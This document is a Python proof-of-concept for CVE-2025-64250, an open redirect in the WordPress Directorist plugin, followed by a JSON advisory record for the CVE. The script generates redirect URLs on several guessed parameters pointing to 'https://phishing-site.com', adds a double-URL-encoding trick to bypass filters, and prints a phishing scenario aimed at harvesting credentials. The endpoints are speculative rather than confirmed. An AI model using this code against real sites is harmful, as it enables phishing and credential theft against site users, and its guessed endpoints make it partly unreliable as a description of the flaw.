CVE-2025-64250

## CVE-2025-64250 Open Redirect PoC ## Target: WordPress Directorist Plugin <= 8.6.6 ## Vulnerability: Open Redirect via unvalidated URL parameter import urllib.parse def generate_open_redirect_poc(target_url, malicious_domain): """ Generate PoC URL for open redirect vulnerability Args: target_url: The vulnerable WordPress site with Directorist plugin malicious_domain: Attacker's controlled domain for redirection Returns: PoC URL that demonstrates the vulnerability """ # Encode the malicious URL to bypass basic filters encoded_redirect = urllib.parse.quote(malicious_domain, safe='') # Common Directorist endpoints that may be vulnerable vulnerable_endpoints = [ f"{target_url}/?redirect={encoded_redirect}", f"{target_url}/?url={encoded_redirect}", f"{target_url}/?action=redirect&to={encoded_redirect}", f"{target_url}/?redirect_to={encoded_redirect}" ] return vulnerable_endpoints # Example usage target = "https://example.com" attacker_domain = "https://phishing-site.com" pocs = generate_open_redirect_poc(target, attacker_domain) print("=== CVE-2025-64250 PoC URLs ===") for i, poc in enumerate(pocs, 1): print(f"{i}. {poc}") print("\n=== Attack Scenario ===") print("1. Attacker crafts a phishing page mimicking the target site") print("2. Attacker sends the PoC URL to potential victims") print("3. Victim clicks link, sees trusted domain, enters credentials") print("4. Credentials are sent to attacker's server") # Double URL encoding to bypass some filters def double_encode_poc(target_url, malicious_domain): """Bypass filters that only decode once""" first_encode = urllib.parse.quote(malicious_domain, safe='') second_encode = urllib.parse.quote(first_encode, safe='') return f"{target_url}/?redirect={second_encode}"

{"cve": {"id": "CVE-2025-64250", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:15:54.807", "lastModified": "2026-04-27T16:16:37.713", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "URL Redirection to Untrusted Site ('Open Redirect') vulnerability in wpWax Directorist directorist allows Phishing.This issue affects Directorist: from n/a through <= 8.6.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/directorist/vulnerability/wordpress-directorist-plugin-8-5-6-open-redirection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}